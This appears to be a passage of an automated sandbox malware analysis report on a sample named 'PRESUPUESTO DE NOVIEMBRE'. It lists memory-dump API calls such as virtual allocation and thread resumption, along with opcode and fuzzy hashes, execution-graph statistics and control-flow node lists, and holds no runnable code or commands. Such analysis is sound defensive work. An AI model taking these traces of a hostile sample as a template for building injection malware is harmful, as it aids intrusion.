                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: 0435209dc14c0fe6f9e559ea2cd367121b3c20a936071f2f79f2f872d957a916
                                                                                              • Instruction ID: 5e09a05dd7a1dd4296b43768b47bfb5d6a02557b81c3e5edbe10a3e0d9aab56c
                                                                                              • Opcode Fuzzy Hash: 0435209dc14c0fe6f9e559ea2cd367121b3c20a936071f2f79f2f872d957a916
                                                                                              • Instruction Fuzzy Hash: 171137B19002499FCB10DFAAD845BDFBFF9EF48320F108819E519A7250C775A944CFA0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: 7ec29d08e6942ed5e323ba2ca5c78f96cd7d66be889aa6fa8065cf85afbf409c
                                                                                              • Instruction ID: e8f42c0f4326b338217b79446673834deb55aa058f23841b92adb73a37c93899
                                                                                              • Opcode Fuzzy Hash: 7ec29d08e6942ed5e323ba2ca5c78f96cd7d66be889aa6fa8065cf85afbf409c
                                                                                              • Instruction Fuzzy Hash: 9D1158B1D003498FCB20DFAAD4457DEFBF8EB88320F20841AD519A7240CB756944CFA5
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: f932f4bf71c8163e4f69019b4d7f033f35a8417041b246990cc9a8dbc86433e2
                                                                                              • Instruction ID: 4b0be7e2a236f706c6843441365434b617098cf077ed415fdc0dc452de31f352
                                                                                              • Opcode Fuzzy Hash: f932f4bf71c8163e4f69019b4d7f033f35a8417041b246990cc9a8dbc86433e2
                                                                                              • Instruction Fuzzy Hash: ED113AB1D003498FCB20DFAAC4457DEFBF9AB88324F208419D519A7250C7756944CFA4
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0781FED5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: 6da70b1f7ef7c75de5a1f978b6d9cdb32059a046b2e457ad4c23575c08ed4148
                                                                                              • Instruction ID: 6919ddf12c4ae126de1355de2669df55ac33668edf95cb264d2e53d1fc19ac4d
                                                                                              • Opcode Fuzzy Hash: 6da70b1f7ef7c75de5a1f978b6d9cdb32059a046b2e457ad4c23575c08ed4148
                                                                                              • Instruction Fuzzy Hash: C511F5B58003499FCB10DF99D444BDEBBF8EB58310F108419E518A7201C375A944CFA1
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0781FED5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: a7b0fdd9bb1454d4aeac6f87f1b983ad5dcf7593be837fcf4cef1a8f698ab963
                                                                                              • Instruction ID: e66da8c625aeda9d89f9a678fd1b032ed14ae3194b1e1e2b04fc9258c7adb624
                                                                                              • Opcode Fuzzy Hash: a7b0fdd9bb1454d4aeac6f87f1b983ad5dcf7593be837fcf4cef1a8f698ab963
                                                                                              • Instruction Fuzzy Hash: 441103B58007499FDB10DF99D845BDFBFF8EB58320F10841AD918A7241C375A984CFA1
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0150B59E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1313398111.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1500000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: 28e0765b3d75a7fb1e9f5a2a1b358f969b012a19c1231386d2b59916598e986e
                                                                                              • Instruction ID: 779e216fe1a01ca48cc0e10d5e8adfccadedb18f471eadf9979af92a2363c1dc
                                                                                              • Opcode Fuzzy Hash: 28e0765b3d75a7fb1e9f5a2a1b358f969b012a19c1231386d2b59916598e986e
                                                                                              • Instruction Fuzzy Hash: B41110B5C003498FDB10CF9AD444ADEFBF4AB88310F14845AD828B7250D375A545CFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1312719010.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_122d000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b62d47f63343302360e82398a702132b2640ec8c963d1e5f4933c071f5fce7e9
                                                                                              • Instruction ID: 0800f3a7fb31dfb957e62dbc7d6e5c9701c9f594110824976ea95737b12669fc
                                                                                              • Opcode Fuzzy Hash: b62d47f63343302360e82398a702132b2640ec8c963d1e5f4933c071f5fce7e9
                                                                                              • Instruction Fuzzy Hash: 61216771514248EFDB01DF58E9C0F2ABF65FB88318F20C569E9090B256C3B6E466CBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1312719010.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_122d000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 179c1a411ee56cbb446c2c146d1c4d1c71f9dd289fd693f5c9d906bfcfa748c3
                                                                                              • Instruction ID: c91efaa596c96ed5ad159360eb664bc808e3dd43852a9e812ba35c038d215d05
                                                                                              • Opcode Fuzzy Hash: 179c1a411ee56cbb446c2c146d1c4d1c71f9dd289fd693f5c9d906bfcfa748c3
                                                                                              • Instruction Fuzzy Hash: F0216A75514208EFDB05DF48C9C0B5ABF65FB88314F20C16DE9090B25AC376E446CBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1312754416.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_123d000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9bda984633548c6481348f1ba184efbab87fb471fa0a0bbaba15aa1f4b40c343
                                                                                              • Instruction ID: b7f3f3e25e89bdef193479b1a893c00ec4b56674e6a67dccba2800bdbb5f2da0
                                                                                              • Opcode Fuzzy Hash: 9bda984633548c6481348f1ba184efbab87fb471fa0a0bbaba15aa1f4b40c343
                                                                                              • Instruction Fuzzy Hash: 5E2149B1524208DFDB01DF98C5C0B26BB65FBC4324F60C56DE9494B257C376D406CA61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1312754416.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_123d000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0daa981f6f0fafbd4f5b16948392b88837e59273310fd20131b0d72c56f0fcf3
                                                                                              • Instruction ID: 8c6888cc06d6bdcdfbaee5b76a7449c4b43e599985f81efc53a5eec97fe0c373
                                                                                              • Opcode Fuzzy Hash: 0daa981f6f0fafbd4f5b16948392b88837e59273310fd20131b0d72c56f0fcf3
                                                                                              • Instruction Fuzzy Hash: 9F2130B0614208DFCB11CFA8D980B26FB65EB88B14F60C569E90A0B256C37AD406CA61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1312754416.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_123d000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5b9cdc1c238059e941d455d93a932b3f73bd1a2597ed35516979e3dd9edccf68
                                                                                              • Instruction ID: eab3d03f96f207c6e4e48aac76daded34f3f8cde3bd609fe564a9f78c3d98d14
                                                                                              • Opcode Fuzzy Hash: 5b9cdc1c238059e941d455d93a932b3f73bd1a2597ed35516979e3dd9edccf68
                                                                                              • Instruction Fuzzy Hash: AA21B3714083849FCB02CF64D994711BF71EB86314F28C5DAD9498F2A7C33AD80ACB62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1312719010.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_122d000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                                                              • Instruction ID: 40e3136a6dfc195517fa30c25a1fffe7a659018c6b8dd7d22726b789320d3739
                                                                                              • Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                                                              • Instruction Fuzzy Hash: C3110376404284DFDB12CF54D5C4B1ABF71FB84314F24C6A9E9090B257C33AD46ACBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1312719010.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_122d000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                                                              • Instruction ID: bb5dd91affe23deee0a787c3709203da62b65301305e1dbf128b10804c6f93fe
                                                                                              • Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                                                              • Instruction Fuzzy Hash: 72110376404284DFDB12CF44D9C4B5ABF71FB84324F24C2A9D9090B257C33AE45ACBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1312754416.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_123d000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                                                              • Instruction ID: c47cbf8a465e67f2cf629255a892f6b3ea69edf5cec6afa285ef4cd64f099c9a
                                                                                              • Opcode Fuzzy Hash: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                                                              • Instruction Fuzzy Hash: DB11BBB5504284DFDB02CF54C5C4B15BBA1FB84224F24C6A9E9494B297C33AD40ACB61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1312719010.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_122d000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 782e286bd6a22226a029bef965c4cf89a8697563a85051ef5b4e98cc6092ec50
                                                                                              • Instruction ID: 86ff9d16c3009e211913c1a2b5bc552782a3ec3558af4d21d72dd2ff705b0ff6
                                                                                              • Opcode Fuzzy Hash: 782e286bd6a22226a029bef965c4cf89a8697563a85051ef5b4e98cc6092ec50
                                                                                              • Instruction Fuzzy Hash: 34012B71014398BAE7248F59CD84B6BBF9CDF41320F08C52AEE094A286D27D9800CAB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1312719010.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_122d000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 91fb9318844b58b70663671a2117f61f0e87bf027eab60b90ba41e197843215b
                                                                                              • Instruction ID: 93870dfe0b19d98b0fbc10b036f9ee856b3f6626b7658efa9b3f6434a47c1752
                                                                                              • Opcode Fuzzy Hash: 91fb9318844b58b70663671a2117f61f0e87bf027eab60b90ba41e197843215b
                                                                                              • Instruction Fuzzy Hash: 62F09671404394AEE7258F1ACC88B66FF9CEF41734F18C45AEE485B286C27D9844CBB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: de9774ba22a0c447712b9c6f064159025318428ae7f702c519341de1a5a6dbf0
                                                                                              • Instruction ID: 1f54d55b2de352115ddaf33574d581f000980984af73c61e5b23910ca2257c8c
                                                                                              • Opcode Fuzzy Hash: de9774ba22a0c447712b9c6f064159025318428ae7f702c519341de1a5a6dbf0
                                                                                              • Instruction Fuzzy Hash: 98E11AB4E102598FCB14DFA9C990AAEFBB6FF49304F24C169D414AB355DB30A941CFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fc8ee3483b22af7498281c8f835ac5db21b279bdfa8e027cc5dcb1f90642bfca
                                                                                              • Instruction ID: 1fd6d839ce8f211afe3ca16ec2cbdf0298f461e177b08b724863a9da7d87a737
                                                                                              • Opcode Fuzzy Hash: fc8ee3483b22af7498281c8f835ac5db21b279bdfa8e027cc5dcb1f90642bfca
                                                                                              • Instruction Fuzzy Hash: 29E119B4E012198FCB14DFA9C590AAEFBB6BF89304F24C169D415AB355D730AD42CFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9cb0455ca661ba8fe10f7a73f93d9157e6bcb2598f619675bc15bcfe9286ce51
                                                                                              • Instruction ID: 98ec0b1699a0b4afaf550bb1a2c0aa700f5fcfc2726dc0539c2fe6e8eb4473c7
                                                                                              • Opcode Fuzzy Hash: 9cb0455ca661ba8fe10f7a73f93d9157e6bcb2598f619675bc15bcfe9286ce51
                                                                                              • Instruction Fuzzy Hash: 90E1F9B4E112198FCB14DFA9C590AAEFBB6FF89304F248169D415AB355D730AD42CF60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 425442565507f9db588c0a2e933e951852d0f634da59baffea9a078bd8611fb8
                                                                                              • Instruction ID: d435c5883833fe0303c453dfcfca0e4c23bedebdeeec26acb5105bb8b0bf42bc
                                                                                              • Opcode Fuzzy Hash: 425442565507f9db588c0a2e933e951852d0f634da59baffea9a078bd8611fb8
                                                                                              • Instruction Fuzzy Hash: 58E1F8B4E11219CFCB14DFA9C590AAEFBB6FF89304F248169D415AB355D730A942CFA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b2a9b3f4ac38269f06fae640c44b1f20d07dda1bda449ed1908691586e5b0f78
                                                                                              • Instruction ID: 0be0fc3625946dfa92e0161b46aea8f3c03dcd7ab9fdb97866b02bcd65dffefa
                                                                                              • Opcode Fuzzy Hash: b2a9b3f4ac38269f06fae640c44b1f20d07dda1bda449ed1908691586e5b0f78
                                                                                              • Instruction Fuzzy Hash: A5E1F8B4E012198FCB14DFA9C590AAEFBF6FF89304F248169E415AB355D730A942CF60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2184e58b8fc3975776716712f8fb934f23280bfc7d1b551d9071c7661b6178fb
                                                                                              • Instruction ID: 76b06139a3d1560d2100986742cb6503b2d321cc915fccc70593e55eac739238
                                                                                              • Opcode Fuzzy Hash: 2184e58b8fc3975776716712f8fb934f23280bfc7d1b551d9071c7661b6178fb
                                                                                              • Instruction Fuzzy Hash: B8E118B4E012198FCB14DFA9C590AAEFBB6BF89304F24C169E415AB355D730AD41CF61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1313398111.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1500000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5f61159b5f3d681a8130a2ffc1a63063555e49e2183c4b3da0bc0f85b33c27fc
                                                                                              • Instruction ID: 5aefaf34a7954c067ce5584af52631613b4bdb86f647499620c807218cf52436
                                                                                              • Opcode Fuzzy Hash: 5f61159b5f3d681a8130a2ffc1a63063555e49e2183c4b3da0bc0f85b33c27fc
                                                                                              • Instruction Fuzzy Hash: 6AA14E32E002168FCF2ADFA4C8445DEBBB2FFC5300B25496AE905AF295DB71D955CB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f2d29c9b2d927799297e0d9e95b247adcc12073408925eca5cf95334bd240222
                                                                                              • Instruction ID: 720bcf53fc681c4d13ad14641cffde2e06cc9e7002b624637363f65f686f61b8
                                                                                              • Opcode Fuzzy Hash: f2d29c9b2d927799297e0d9e95b247adcc12073408925eca5cf95334bd240222
                                                                                              • Instruction Fuzzy Hash: 61717FB4E056198FCB04DFAAC98499EFBF2BF99300F24C166D819EB215D734A946CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1ee25c71f109ef550cf44c07dcf26fd0a9e08d6c8da10c7e6f393123d4c9bb91
                                                                                              • Instruction ID: 222c5d304c2bde0d67fcdd2b59a1134cfb84e98ad5c7f251b007ea96ba627c60
                                                                                              • Opcode Fuzzy Hash: 1ee25c71f109ef550cf44c07dcf26fd0a9e08d6c8da10c7e6f393123d4c9bb91
                                                                                              • Instruction Fuzzy Hash: E95141B0E052198FDB14DFA9C9505AEFBF6BF89304F24C16AD408E7256D7349942CFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: afb5897f66814e074787b07cb68f0e7b986693da35f0e9118992a5dfec09ed77
                                                                                              • Instruction ID: c83948e80fc37b30e99c65877bce67c94ee45c778825d8aff59e68ca09e63386
                                                                                              • Opcode Fuzzy Hash: afb5897f66814e074787b07cb68f0e7b986693da35f0e9118992a5dfec09ed77
                                                                                              • Instruction Fuzzy Hash: AD513AB0E012198FDB14DFA9C9805AEFBF6FF89304F24816AD418AB355D7309942CFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0963b026591a46c354e177643d740594599a48cc44af2b13ec5eee5029839cfe
                                                                                              • Instruction ID: feb11deeb16af048d9de1848de7b90c305a88f7ccc403898993e39e65be06672
                                                                                              • Opcode Fuzzy Hash: 0963b026591a46c354e177643d740594599a48cc44af2b13ec5eee5029839cfe
                                                                                              • Instruction Fuzzy Hash: 405180B5D046199FDB08CFEAC9846EEFBB6FF99300F10802AE419AB254DB345946CF40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 44c7be7dc8a6dbef9514adbad6554043e210720fdaf20afe7a2a30e9ff43ffeb
                                                                                              • Instruction ID: 15b9f3a60396a5e807e49915511597e7166d298e106991ae1ea8df2b097aac73
                                                                                              • Opcode Fuzzy Hash: 44c7be7dc8a6dbef9514adbad6554043e210720fdaf20afe7a2a30e9ff43ffeb
                                                                                              • Instruction Fuzzy Hash: D25181B5E046198FDB08CFAAC98469EFBF2BF89300F14C16AD419EB214DB349946CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 87039d60a8f3139cc35b4c27daa61c430630d0cf1d3b7e6b3a19aa22c8a5e320
                                                                                              • Instruction ID: 7f779d5428511e2b93748cad781ef4da82bac1084c7bf002e2d530406124e293
                                                                                              • Opcode Fuzzy Hash: 87039d60a8f3139cc35b4c27daa61c430630d0cf1d3b7e6b3a19aa22c8a5e320
                                                                                              • Instruction Fuzzy Hash: 06417FB5E046199BDB08CFEAC9856EEFBF6AF88300F14C52AD419AB254DB345946CF40

                                                                                              Execution Graph

                                                                                              Execution Coverage:10.3%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:17.4%
                                                                                              Total number of Nodes:23
                                                                                              Total number of Limit Nodes:0
                                                                                              execution_graph 22143 300e018 22144 300e024 22143->22144 22150 5c1fc60 22144->22150 22154 5c1fc5e 22144->22154 22158 5c1fc5a 22144->22158 22162 5c1fc68 22144->22162 22145 300e61f 22151 5c1fc66 22150->22151 22153 5c1fd3a 22151->22153 22166 5c19548 LdrInitializeThunk 22151->22166 22153->22145 22155 5c1fc66 22154->22155 22157 5c1fd3a 22155->22157 22167 5c19548 LdrInitializeThunk 22155->22167 22157->22145 22159 5c1fc62 22158->22159 22161 5c1fd3a 22159->22161 22168 5c19548 LdrInitializeThunk 22159->22168 22161->22145 22163 5c1fc8a 22162->22163 22165 5c1fd3a 22163->22165 22169 5c19548 LdrInitializeThunk 22163->22169 22165->22145 22166->22153 22167->22157 22168->22161 22169->22165 22170 5c1992c 22173 5c197e3 22170->22173 22171 5c19a69 LdrInitializeThunk 22172 5c19a81 22171->22172 22173->22171

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 142 3007118-300713b 143 3007146-3007166 142->143 144 300713d-3007143 142->144 147 3007168 143->147 148 300716d-3007174 143->148 144->143 149 30074fc-3007505 147->149 150 3007176-3007181 148->150 151 3007187-300719a 150->151 152 300750d-3007549 150->152 155 30071b0-30071cb 151->155 156 300719c-30071aa 151->156 167 3007552-3007556 152->167 168 300754b-3007550 152->168 163 30071cd-30071d3 155->163 164 30071ef-30071f2 155->164 156->155 161 3007484-300748b 156->161 161->149 171 300748d-300748f 161->171 169 30071d5 163->169 170 30071dc-30071df 163->170 165 30071f8-30071fb 164->165 166 300734c-3007352 164->166 165->166 174 3007201-3007207 165->174 172 3007358-300735d 166->172 173 300743e-3007441 166->173 175 300755c-300755d 167->175 168->175 169->166 169->170 169->173 176 3007212-3007218 169->176 170->176 177 30071e1-30071e4 170->177 178 3007491-3007496 171->178 179 300749e-30074a4 171->179 172->173 182 3007447-300744d 173->182 183 3007508 173->183 174->166 181 300720d 174->181 184 300721a-300721c 176->184 185 300721e-3007220 176->185 186 30071ea 177->186 187 300727e-3007284 177->187 178->179 179->152 180 30074a6-30074ab 179->180 188 30074f0-30074f3 180->188 189 30074ad-30074b2 180->189 181->173 191 3007472-3007476 182->191 192 300744f-3007457 182->192 183->152 193 300722a-3007233 184->193 185->193 186->173 187->173 190 300728a-3007290 187->190 188->183 201 30074f5-30074fa 188->201 189->183 194 30074b4 189->194 195 3007292-3007294 190->195 196 3007296-3007298 190->196 191->161 200 3007478-300747e 191->200 192->152 197 300745d-300746c 192->197 198 3007235-3007240 193->198 199 3007246-300726e 193->199 202 30074bb-30074c0 194->202 203 30072a2-30072b9 195->203 196->203 197->155 197->191 198->173 198->199 221 3007362-3007398 199->221 222 3007274-3007279 199->222 200->150 200->161 201->149 201->171 204 30074e2-30074e4 202->204 205 